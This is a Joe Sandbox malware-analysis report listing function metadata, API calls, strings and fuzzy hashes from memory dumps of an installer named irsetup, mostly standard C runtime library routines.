UTF-8, xrefs: 000000018002CD77
UTF-16LE, xrefs: 000000018002CD9A
=, xrefs: 000000018002CD66
a, xrefs: 000000018002CBCE
UNICODE, xrefs: 000000018002CDBD
, xrefs: 000000018002CDE7

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno_wsopen_s
String ID: $ $ $ $ $=$UNICODE$UTF-16LE$UTF-8$a$ccs$r$w
API String ID: 1497100469-1561892669
Opcode ID: 809ac7aed290ffe497205082508d5eeb03938b6ee526942d5b77e887368b1888
Instruction ID: d6da21fed4115c722398ce3e3561bd801ec631ccb665ac6cd961f74e4c6af8c6
Opcode Fuzzy Hash: 809ac7aed290ffe497205082508d5eeb03938b6ee526942d5b77e887368b1888
Instruction Fuzzy Hash: BF81B3B2A0824C45FBF74A25A904FEA5FC1675D7C4F29C425FE4A069D6DE79CB488303

Function 00000001800383A0 Relevance: 24.3, APIs: 16, Instructions: 348COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(?,?,?,?,?,?,?,00000018,00000000,?,?,?,00000001800388E2), ref: 000000018003840D
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000018,00000000,?,?,?,00000001800388E2), ref: 0000000180038421
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,00000018,00000000,?,?,?,00000001800388E2), ref: 0000000180038524

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: CompareErrorInfoLastString
String ID:
API String ID: 3723911898-0
Opcode ID: a7c54db4274c7bd852224f2bab33c57a8df35dff28d89205a04333a6085d80a5
Instruction ID: caf065914ce32c901bdc0da071f13ae403a8d6858991746fbe812b61d08b1fd8
Opcode Fuzzy Hash: a7c54db4274c7bd852224f2bab33c57a8df35dff28d89205a04333a6085d80a5
Instruction Fuzzy Hash: 77E1AE722047888AEBB39F2194443EA2B92BB497D4F56C565FA5A47BC4DF38CB489700

Function 000000018003CAA8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 197processsynchronizationCOMMON

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 000000018003CAF1
_errno.LIBCMT ref: 000000018003CAF8
__doserrno.LIBCMT ref: 000000018003CC73
CreateProcessA.KERNEL32 ref: 000000018003CCBE
GetLastError.KERNEL32 ref: 000000018003CCC6
free.LIBCMT ref: 000000018003CCD7
WaitForSingleObject.KERNEL32 ref: 000000018003CD03
GetExitCodeProcess.KERNEL32 ref: 000000018003CD16
CloseHandle.KERNEL32 ref: 000000018003CD34
CloseHandle.KERNEL32 ref: 000000018003CD46
_errno.LIBCMT ref: 000000018003CD51

Strings

cmd.exe, xrefs: 000000018003CAB3

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: CloseHandleProcess__doserrno_errno$CodeCreateErrorExitLastObjectSingleWaitfree
String ID: cmd.exe
API String ID: 1143201056-723907552
Opcode ID: 1ec64bca767f0ce2c30d7568805568113e7c73b22f9ca0acadf98c084daf04b7
Instruction ID: bc4d664b3f0a0b6ab182b77c7d05c4b3f8bc629965aac2ee09c429f38f9c3594
Opcode Fuzzy Hash: 1ec64bca767f0ce2c30d7568805568113e7c73b22f9ca0acadf98c084daf04b7
Instruction Fuzzy Hash: 4181B432204A8881EBA38B25E4817EF7761F3897E4F56C212FA59837D1DF79C649C702

Function 00000001800124E0 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 179COMMON

Download Yara Rule

APIs

Part of subcall function 000000018002753C: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,000000018001252F), ref: 000000018002754A

Part of subcall function 000000018002721C: __getgmtimebuf.LIBCMT ref: 000000018002722E

wcsftime.LIBCMT ref: 0000000180012761

Strings

sec, xrefs: 00000001800125D4
min, xrefs: 00000001800125F5
day, xrefs: 0000000180012637
!, xrefs: 000000018001254D
isdst, xrefs: 00000001800126FC
year, xrefs: 0000000180012687
wday, xrefs: 00000001800126AD
%, xrefs: 000000018001271D
month, xrefs: 000000018001265D
yday, xrefs: 00000001800126D3
hour, xrefs: 0000000180012616

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: Time$FileSystem__getgmtimebufwcsftime
String ID: !$%$day$hour$isdst$min$month$sec$wday$yday$year
API String ID: 599264643-611614131
Opcode ID: e8d60ccf7bee7e749e5e1b2cbf8c68d472027f5cf3e427ad52023df90c5721df
Instruction ID: 3f311966028a47db9d835d2390ad335689aacd3f767fa76c62ac224867e760a9
Opcode Fuzzy Hash: e8d60ccf7bee7e749e5e1b2cbf8c68d472027f5cf3e427ad52023df90c5721df
Instruction Fuzzy Hash: 1F71B271204AC889EBA6EB21E4513EA7352EB8D7D1F48C212BD5A073DADE38C70DC740

Function 0000000180028660 Relevance: 18.1, APIs: 11, Strings: 1, Instructions: 90COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 00000001800286AC

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

Part of subcall function 0000000180036640: free.LIBCMT ref: 000000018003665E
Part of subcall function 0000000180036640: free.LIBCMT ref: 0000000180036670
Part of subcall function 0000000180036640: free.LIBCMT ref: 0000000180036682
Part of subcall function 0000000180036640: free.LIBCMT ref: 0000000180036694
Part of subcall function 0000000180036640: free.LIBCMT ref: 00000001800366A6
Part of subcall function 0000000180036640: free.LIBCMT ref: 00000001800366B8
Part of subcall function 0000000180036640: free.LIBCMT ref: 00000001800366CA

free.LIBCMT ref: 00000001800286CE
free.LIBCMT ref: 00000001800286E6
free.LIBCMT ref: 00000001800286F2
free.LIBCMT ref: 0000000180028716
free.LIBCMT ref: 000000018002872A
free.LIBCMT ref: 0000000180028739
free.LIBCMT ref: 0000000180028745
free.LIBCMT ref: 0000000180028772
free.LIBCMT ref: 000000018002879A
free.LIBCMT ref: 00000001800287B4

Strings

%.14g, xrefs: 000000018002866A

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$ErrorFreeHeapLast_errno
String ID: %.14g
API String ID: 1012874770-3267037135
Opcode ID: 47d9f555a568b6f0783db94f213f62370508f50826c306b4ac1c19de6a4250bd
Instruction ID: af0bc440c63a20798cdb7aeb7fc5255632f61c08f109e4c0f4434e2bfff94dc4
Opcode Fuzzy Hash: 47d9f555a568b6f0783db94f213f62370508f50826c306b4ac1c19de6a4250bd
Instruction Fuzzy Hash: EF41EE36602A8884EFE79F65D4553FC2360AB8CBD8F188432FA194A795CF74CB99D710

Function 000000018002C2FC Relevance: 18.1, APIs: 12, Instructions: 82COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 000000018002C31B

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

free.LIBCMT ref: 000000018002C329
free.LIBCMT ref: 000000018002C337
free.LIBCMT ref: 000000018002C345
free.LIBCMT ref: 000000018002C353
free.LIBCMT ref: 000000018002C361
free.LIBCMT ref: 000000018002C372
free.LIBCMT ref: 000000018002C38A
_lock.LIBCMT ref: 000000018002C394
free.LIBCMT ref: 000000018002C3C2
_lock.LIBCMT ref: 000000018002C3D7
free.LIBCMT ref: 000000018002C421

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$_lock$ErrorFreeHeapLast_errno
String ID:
API String ID: 1575098132-0
Opcode ID: 45039a1f34f5a8ca6a309a91bc759b7c570e1b30efeed7530d3bf206d5ce8a12
Instruction ID: cb46baaaa23a1663d07188939efbc8fc8364fa3fc97ea10782da97baff015f18
Opcode Fuzzy Hash: 45039a1f34f5a8ca6a309a91bc759b7c570e1b30efeed7530d3bf206d5ce8a12
Instruction Fuzzy Hash: D6310E35302A4885FEEBEB659061BFC2351AF8DBC4F48D526F91A476C6CE54CB4C8316

Function 000000018003B0E8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 256COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018003B110

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

__wtomb_environ.LIBCMT ref: 000000018003B209
_errno.LIBCMT ref: 000000018003B213
free.LIBCMT ref: 000000018003B305
SetEnvironmentVariableA.KERNEL32 ref: 000000018003B450
_errno.LIBCMT ref: 000000018003B45E
free.LIBCMT ref: 000000018003B46C
free.LIBCMT ref: 000000018003B479
free.LIBCMT ref: 000000018003B48B

Strings

COMSPEC, xrefs: 000000018003B0F2

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$_errno$DecodeEnvironmentPointerVariable__wtomb_environ
String ID: COMSPEC
API String ID: 3451773520-1631433037
Opcode ID: 138668e7748e24d3d92ce4ae88ceeb87a22b90512250c6b183fbb027a10e2112
Instruction ID: 4ba3cebf007e37312f75b89635b496495a772fde7ddc12decf222640a794de8d
Opcode Fuzzy Hash: 138668e7748e24d3d92ce4ae88ceeb87a22b90512250c6b183fbb027a10e2112
Instruction Fuzzy Hash: 4EA1B036601A9C81FAE3AB15A9003EF6391F7887DCF56C615BB5A87785CF38879D8300

Function 0000000180036A98 Relevance: 15.3, APIs: 10, Instructions: 253COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 0000000180036BBF

Part of subcall function 000000018002FB40: GetLastError.KERNEL32 ref: 000000018002FBA9
Part of subcall function 000000018002FB40: free.LIBCMT ref: 000000018002FC35

free.LIBCMT ref: 0000000180036D88
free.LIBCMT ref: 0000000180036D98
free.LIBCMT ref: 0000000180036DA8
free.LIBCMT ref: 0000000180036DB4
free.LIBCMT ref: 0000000180036E09
free.LIBCMT ref: 0000000180036E11
free.LIBCMT ref: 0000000180036E19
free.LIBCMT ref: 0000000180036E21
free.LIBCMT ref: 0000000180036E2B

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$ErrorInfoLast
String ID:
API String ID: 189849726-0
Opcode ID: fdc52e7ef457eee3671ced87c46925b60b1a97f1e4e84eb13b3e6ac80a3ae5b4
Instruction ID: 0cfcddc6f49efeab6f4f61afc9e86eb49e25840f6bfa506a9695891ebaf45d4b
Opcode Fuzzy Hash: fdc52e7ef457eee3671ced87c46925b60b1a97f1e4e84eb13b3e6ac80a3ae5b4
Instruction Fuzzy Hash: 27B19F32604AD486DBA2CF25E4503EEB7A4F748B84F95C126FB99877A5DF38C649C700

Function 000000018003D45C Relevance: 15.2, APIs: 10, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D4B2
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D4D1
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D576
malloc.LIBCMT ref: 000000018003D58D
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D5D5
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D610
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D64C
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D68C
free.LIBCMT ref: 000000018003D69A
free.LIBCMT ref: 000000018003D6BC

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ByteCharMultiWide$Infofree$malloc
String ID:
API String ID: 1309074677-0
Opcode ID: 8833ed16186a4408ec5588ce627eacfd5c2b61c901c329b3215a334107bb986e
Instruction ID: ef16a251ce0a63a525c3aa4d0bbb8d493572552397f9166123f23fc75798a009
Opcode Fuzzy Hash: 8833ed16186a4408ec5588ce627eacfd5c2b61c901c329b3215a334107bb986e
Instruction Fuzzy Hash: DA61E432204B8886E7A39F25B4403EB77D5F7897E8F158626FA5A43BD4DF38C6498700

Function 0000000180038D00 Relevance: 15.1, APIs: 10, Instructions: 121COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038D2F
GetLastError.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038D49
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038D6F
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038DC4
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038E00
free.LIBCMT ref: 0000000180038E0E
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038E19
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038E31
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038E72
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038E8E

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLastfree
String ID:
API String ID: 994105223-0
Opcode ID: b562fa2b34240d575bd56bcb114a87d5ce86f3de295457b19021f060fd77cd6e
Instruction ID: d9ef7338b76749b8665854ab0faee35fb482f0185a0d43e1efd96c80377bbde6
Opcode Fuzzy Hash: b562fa2b34240d575bd56bcb114a87d5ce86f3de295457b19021f060fd77cd6e
Instruction Fuzzy Hash: 3E41C33260475C82EAE7AF12A9443AB7791BB5CBC0F1AC454FA4707BA9CF78D658D300

Function 0000000180003220 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 134COMMON

Download Yara Rule

APIs

Part of subcall function 000000018001EEF0: _errno.LIBCMT ref: 000000018001EF10

_wfreopen.LIBCMT ref: 00000001800032D3

Part of subcall function 000000018001EEF0: _errno.LIBCMT ref: 000000018001EFBA

_errno.LIBCMT ref: 00000001800033C2

Strings

read, xrefs: 00000001800033DE
=stdin, xrefs: 0000000180003262
@%s, xrefs: 00000001800032F9
cannot %s %s: %s, xrefs: 00000001800033E5
reopen, xrefs: 00000001800032E2
open, xrefs: 0000000180003328

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_wfreopen
String ID: =stdin$@%s$cannot %s %s: %s$open$read$reopen
API String ID: 1073068216-1171916245
Opcode ID: d7e4a053d725cb62ee5042be342918985159208fa4f717f7af988af5555a754d
Instruction ID: 1853566ffd4394b5b462cd73b286757f755f6c0d306ff0bd9e01786340f21f8e
Opcode Fuzzy Hash: d7e4a053d725cb62ee5042be342918985159208fa4f717f7af988af5555a754d
Instruction Fuzzy Hash: 8051B731214A8881FEE7EB66A5813EE7795AB8E7C0F44D112FA4A47796DF38C34D8740

Function 0000000180037A04 Relevance: 13.7, APIs: 9, Instructions: 173COMMONLIBRARYCODE

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037A64
GetLastError.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037A76
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037AD6
malloc.LIBCMT ref: 0000000180037B42
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037B8C
GetStringTypeW.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037BA3
free.LIBCMT ref: 0000000180037BB4
GetStringTypeA.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037C31
free.LIBCMT ref: 0000000180037C41

Part of subcall function 000000018003D45C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D4B2
Part of subcall function 000000018003D45C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D4D1
Part of subcall function 000000018003D45C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D5D5
Part of subcall function 000000018003D45C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D610

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ByteCharMultiWide$StringType$Infofree$ErrorLastmalloc
String ID:
API String ID: 3804003340-0
Opcode ID: ac954491406045a83ae058f29b84b2635aa9f93dc0ff5126d077dd45d2821ec1
Instruction ID: b72f06588925f2ba8d140ce4529a3e9eb07fecfdf33ec2bb692ee0be162e1f54
Opcode Fuzzy Hash: ac954491406045a83ae058f29b84b2635aa9f93dc0ff5126d077dd45d2821ec1
Instruction Fuzzy Hash: 1F618232300A888AE7B39F25E4407DAA7A2F74CBE8F158615FA1D53BD5DF74CA498740

Function 000000018002097C Relevance: 13.6, APIs: 9, Instructions: 98COMMON

Download Yara Rule

APIs

_lock.LIBCMT ref: 00000001800209A5
DecodePointer.KERNEL32 ref: 00000001800209D8
DecodePointer.KERNEL32 ref: 00000001800209F5
DecodePointer.KERNEL32 ref: 0000000180020A34
DecodePointer.KERNEL32 ref: 0000000180020A4D
DecodePointer.KERNEL32 ref: 0000000180020A5C
_initterm.LIBCMT ref: 0000000180020A9B
_initterm.LIBCMT ref: 0000000180020AAE
ExitProcess.KERNEL32 ref: 0000000180020AE7

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: DecodePointer$_initterm$ExitProcess_lock
String ID:
API String ID: 2551688548-0
Opcode ID: 91fa77b406ca58debd3888dab31120533d0dae9adbe6a87bb51551a7cd56bf2b
Instruction ID: 0925ad66611745c8ce2a8e9b3f352f1836afede7ec58ebd276bd38845fb38505
Opcode Fuzzy Hash: 91fa77b406ca58debd3888dab31120533d0dae9adbe6a87bb51551a7cd56bf2b
Instruction Fuzzy Hash: D1416D31212B4885EAE3DB11E8817DA63A4B78C7C4F64C025BA8D437A7EF78C65D8742

Function 0000000180032F64 Relevance: 13.6, APIs: 9, Instructions: 89COMMON

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 0000000180032F8D
_errno.LIBCMT ref: 0000000180032F96
__doserrno.LIBCMT ref: 0000000180032FE5
_errno.LIBCMT ref: 0000000180032FEC

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: f65c103c47602ed978b93713e1d3f39d8ad6cd9bee0c213a3201f4354ec7b13a
Instruction ID: a7b466250e8cbf9d99a39da3f19165df2e40a545f04f40789bff1e1118104bb7
Opcode Fuzzy Hash: f65c103c47602ed978b93713e1d3f39d8ad6cd9bee0c213a3201f4354ec7b13a
Instruction Fuzzy Hash: 0E31073261068841F797AF26A8827EE7751B7C97E0F56C616FA69077D2CE38C609C700

Function 0000000180039498 Relevance: 12.1, APIs: 8, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00000001800394C1
_errno.LIBCMT ref: 00000001800394CA
__doserrno.LIBCMT ref: 000000018003951A
_errno.LIBCMT ref: 0000000180039521

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: f8ec99dead7eae27ea62b11ceaad04973049ee7c1eae35e6748e305a13c8aa8c
Instruction ID: e70739f4f642107e89704e3f638af8b430b091e6b205e4125928beaead29ef60
Opcode Fuzzy Hash: f8ec99dead7eae27ea62b11ceaad04973049ee7c1eae35e6748e305a13c8aa8c
Instruction Fuzzy Hash: 1531F332611A8841E793AFA6A8417EE3651B7897F0F52C316FE3907BD6CE38C245C700

Function 0000000180032D98 Relevance: 12.1, APIs: 8, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 0000000180032DC1
_errno.LIBCMT ref: 0000000180032DCA
__doserrno.LIBCMT ref: 0000000180032E19
_errno.LIBCMT ref: 0000000180032E20

Memory Dump Source

